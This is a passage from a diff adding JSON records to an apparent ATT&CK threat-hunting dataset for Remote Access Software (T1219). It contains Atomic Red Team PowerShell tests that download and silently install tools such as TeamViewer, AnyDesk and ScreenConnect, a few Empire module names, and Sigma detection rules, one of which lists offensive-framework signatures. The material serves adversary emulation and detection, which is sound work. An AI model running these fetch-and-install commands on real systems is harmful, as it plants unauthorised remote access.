This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + null + ] + }, + { + "technique_id": "T1219", + "command_list": [ + "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\TeamViewer_Setup.exe\"\nStart-Process -Wait $file1 /S; \nStart-Process 
'C:\\Program Files (x86)\\TeamViewer\\TeamViewer.exe'\n", + "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\AnyDesk.exe\"\nStart-Process $file1 /S;\n", + "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\LogMeInIgnition.msi https://secure.logmein.com/LogMeInIgnition.msi\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\LogMeInIgnition.msi\"\nStart-Process -Wait $file1 /quiet;\nStart-Process 'C:\\Program Files (x86)\\LogMeIn Ignition\\LMIIgnition.exe' \"/S\"\n", + "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Downloads\\GoToAssist.exe \"https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1\"\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Downloads\\GoToAssist.exe\"\nStart-Process $file1 /S;\n", + "$installer = \"C:\\Users\\$env:username\\Downloads\\ScreenConnect.msi\"\nInvoke-WebRequest -OutFile $installer \"https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi\"\nmsiexec /i $installer /qn\n", + "Start-Process $env:temp\\ammyy.exe\n", + "Start-Process $env:temp\\RemotePC.exe\n", + "powershell/management/vnc", + "python/management/osx/screen_sharing" + ], + "commands": [ + { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe\n$file1 = 
\"C:\\Users\\\" + $env:username + \"\\Desktop\\TeamViewer_Setup.exe\"\nStart-Process -Wait $file1 /S; \nStart-Process 'C:\\Program Files (x86)\\TeamViewer\\TeamViewer.exe'\n", + "source": "atomics/T1219/T1219.yaml", + "name": "Atomic Red Team Test - Remote Access Software" + }, + { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\AnyDesk.exe\"\nStart-Process $file1 /S;\n", + "source": "atomics/T1219/T1219.yaml", + "name": "Atomic Red Team Test - Remote Access Software" + }, + { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\LogMeInIgnition.msi https://secure.logmein.com/LogMeInIgnition.msi\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\LogMeInIgnition.msi\"\nStart-Process -Wait $file1 /quiet;\nStart-Process 'C:\\Program Files (x86)\\LogMeIn Ignition\\LMIIgnition.exe' \"/S\"\n", + "source": "atomics/T1219/T1219.yaml", + "name": "Atomic Red Team Test - Remote Access Software" + }, + { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Downloads\\GoToAssist.exe \"https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1\"\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Downloads\\GoToAssist.exe\"\nStart-Process $file1 /S;\n", + "source": "atomics/T1219/T1219.yaml", + "name": "Atomic Red Team Test - Remote Access Software" + }, + { + 
"command": "$installer = \"C:\\Users\\$env:username\\Downloads\\ScreenConnect.msi\"\nInvoke-WebRequest -OutFile $installer \"https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi\"\nmsiexec /i $installer /qn\n", + "source": "atomics/T1219/T1219.yaml", + "name": "Atomic Red Team Test - Remote Access Software" + }, + { + "command": "Start-Process $env:temp\\ammyy.exe\n", + "source": "atomics/T1219/T1219.yaml", + "name": "Atomic Red Team Test - Remote Access Software" + }, + { + "command": "Start-Process $env:temp\\RemotePC.exe\n", + "source": "atomics/T1219/T1219.yaml", + "name": "Atomic Red Team Test - Remote Access Software" + }, + { + "command": "powershell/management/vnc", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/management/osx/screen_sharing", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1219", + "display_name": "Remote Access Software", + "atomic_tests": [ + { + "name": "TeamViewer Files Detected Test on Windows", + "auto_generated_guid": "8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0", + "description": "An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine. 
Download of TeamViewer installer will be at the destination location when sucessfully executed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\TeamViewer_Setup.exe\"\nStart-Process -Wait $file1 /S; \nStart-Process 'C:\\Program Files (x86)\\TeamViewer\\TeamViewer.exe'\n", + "cleanup_command": "$file = 'C:\\Program Files (x86)\\TeamViewer\\uninstall.exe'\nif(Test-Path $file){ Start-Process $file \"/S\" -ErrorAction Ignore | Out-Null }\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\TeamViewer_Setup.exe\"\nRemove-Item $file1 -ErrorAction Ignore | Out-Null", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "AnyDesk Files Detected Test on Windows", + "auto_generated_guid": "6b8b7391-5c0a-4f8c-baee-78d8ce0ce330", + "description": "An adversary may attempt to trick the user into downloading AnyDesk and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\AnyDesk.exe\"\nStart-Process $file1 /S;\n", + "cleanup_command": "$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\AnyDesk.exe.exe\"\nRemove-Item $file1 -ErrorAction Ignore", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "LogMeIn Files Detected Test on Windows", + "auto_generated_guid": "d03683ec-aae0-42f9-9b4c-534780e0f8e1", + "description": "An adversary may attempt to trick the user into downloading LogMeIn and use to establish C2. 
Download of LogMeIn installer will be at the destination location and ran when sucessfully executed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\LogMeInIgnition.msi https://secure.logmein.com/LogMeInIgnition.msi\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\LogMeInIgnition.msi\"\nStart-Process -Wait $file1 /quiet;\nStart-Process 'C:\\Program Files (x86)\\LogMeIn Ignition\\LMIIgnition.exe' \"/S\"\n", + "cleanup_command": "get-package *'LogMeIn Client'* -ErrorAction Ignore | uninstall-package \n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\LogMeInIgnition.msi\"\nRemove-Item $file1 -ErrorAction Ignore", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "GoToAssist Files Detected Test on Windows", + "auto_generated_guid": "1b72b3bd-72f8-4b63-a30b-84e91b9c3578", + "description": "An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. 
Download of GoToAssist installer will be at the destination location and ran when sucessfully executed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Downloads\\GoToAssist.exe \"https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1\"\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Downloads\\GoToAssist.exe\"\nStart-Process $file1 /S;\n", + "cleanup_command": "try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{}", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "ScreenConnect Application Download and Install on Windows", + "auto_generated_guid": "4a18cc4e-416f-4966-9a9d-75731c4684c0", + "description": "An adversary may attempt to trick the user into downloading ScreenConnect for use as a C2 channel. 
Download of ScreenConnect installer will be in the Downloads directory.\nMsiexec will be used to quietly insall ScreenConnect.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$installer = \"C:\\Users\\$env:username\\Downloads\\ScreenConnect.msi\"\nInvoke-WebRequest -OutFile $installer \"https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi\"\nmsiexec /i $installer /qn\n", + "cleanup_command": "$installer = \"C:\\Users\\$env:username\\Downloads\\ScreenConnect.msi\"\nmsiexec /x $installer /qn\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Ammyy Admin Software Execution", + "auto_generated_guid": "0ae9e327-3251-465a-a53b-485d4e3f58fa", + "description": "An adversary may attempt to trick the user into downloading Ammyy Admin Remote Desktop Software for use as a C2 channel. \nUpon successful execution, Ammyy Admin will be executed. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "Ammyy_Admin_Path": { + "description": "Path of Ammyy Admin executable", + "type": "Path", + "default": "$env:temp\\ammyy.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Ammyy Admin must exist on disk at the specified location (#{Ammyy_Admin_Path})\n", + "prereq_command": "if (Test-Path #{Ammyy_Admin_Path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Start-BitsTransfer -Source \"https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe\" -Destination \"$env:temp\\ammyy.exe\" -dynamic\n" + } + ], + "executor": { + "command": "Start-Process #{Ammyy_Admin_Path}\n", + "cleanup_command": "Stop-Process -Name \"Ammyy\" -force -erroraction silentlycontinue\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "RemotePC Software Execution", + "auto_generated_guid": "fbff3f1f-b0bf-448e-840f-7e1687affdce", + "description": "An adversary may attempt to trick the user into downloading RemotePC 
Software for use as a C2 channel. \nUpon successful execution, RemotePC will be executed. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "RemotePC_Path": { + "description": "Path of RemotePC executable", + "type": "Path", + "default": "$env:temp\\RemotePC.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "RemotePC must exist on disk at the specified location (#{RemotePC_Path})\n", + "prereq_command": "if (Test-Path #{RemotePC_Path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Start-BitsTransfer -Source \"https://static.remotepc.com/downloads/rpc/140422/RemotePC.exe\" -Destination \"#{RemotePC_Path}\" -dynamic\n" + } + ], + "executor": { + "command": "Start-Process #{RemotePC_Path}\n", + "cleanup_command": "Unregister-ScheduledTask -TaskName \"RemotePC\" -Confirm:$False -ErrorAction SilentlyContinue\nUnregister-ScheduledTask -TaskName \"RPCServiceHealthCheck\" -Confirm:$False -ErrorAction SilentlyContinue\nUnregister-ScheduledTask -TaskName \"ServiceMonitor\" -Confirm:$False -ErrorAction SilentlyContinue\nUnregister-ScheduledTask -TaskName \"StartRPCService\" -Confirm:$False -ErrorAction SilentlyContinue \nStop-Process -Name \"RemotePCPerformance\" -force -erroraction silentlycontinue\nStop-Process -Name \"RPCPerformanceService\" -force -erroraction silentlycontinue\nStop-Process -Name \"RemotePCUIU\" -force -erroraction silentlycontinue\nStop-Process -Name \"RPCDownloader\" -force -erroraction silentlycontinue\nStop-Process -Name \"RemotePCService\" -force -erroraction silentlycontinue\nStop-Process -Name \"RPCService\" -force -erroraction silentlycontinue\n", + "name": "powershell", + "elevation_required": true + } + } + ] + }, + { + "Empire Module": "powershell/management/vnc", + "ATT&CK Technique #1": "T1219", + "ATT&CK Technique #2": "", + "Technique": "Remote Access Tools", + "Concatenate for Python Dictionary": "\"powershell/management/vnc\": [\"T1219\"]," + }, + { + "Empire 
Module": "python/management/osx/screen_sharing", + "ATT&CK Technique #1": "T1219", + "ATT&CK Technique #2": "T1021", + "Technique": "Remote Access Tools", + "Concatenate for Python Dictionary": "\"python/management/osx/screen_sharing\": [\"T1219\",\"T1021\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Antivirus Exploitation Framework Detection", + "id": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", + "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework", + "date": "2018/09/09", + "modified": "2019/01/16", + "author": "Florian Roth", + "references": [ + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.command_and_control", + "attack.t1219" + ], + "logsource": { + "product": "antivirus" + }, + "detection": { + "selection": { + "Signature": [ + "*MeteTool*", + "*MPreter*", + "*Meterpreter*", + "*Metasploit*", + "*PowerSploit*", + "*CobaltSrike*", + "*Swrort*", + "*Rozena*", + "*Backdoor.Cobalt*" + ] + }, + "condition": "selection" + }, + "fields": [ + "FileName", + "User" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + { + "title": "Suspicious TSCON Start", + "id": "9847f263-4a81-424f-970c-875dab15b79b", + "status": "experimental", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "references": [ + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6" + ], + "author": "Florian Roth", + "date": "2018/03/17", + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "User": "NT AUTHORITY\\SYSTEM", + "Image": "*\\tscon.exe" + }, + "condition": "selection" + }, + "falsepositives": 
[ + "Unknown" + ], + "level": "high" + }, + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Network intrusion detection system" + ], + [ + "Network protocol analysis" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Network intrusion detection system" + ], + [ + "Network protocol analysis" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
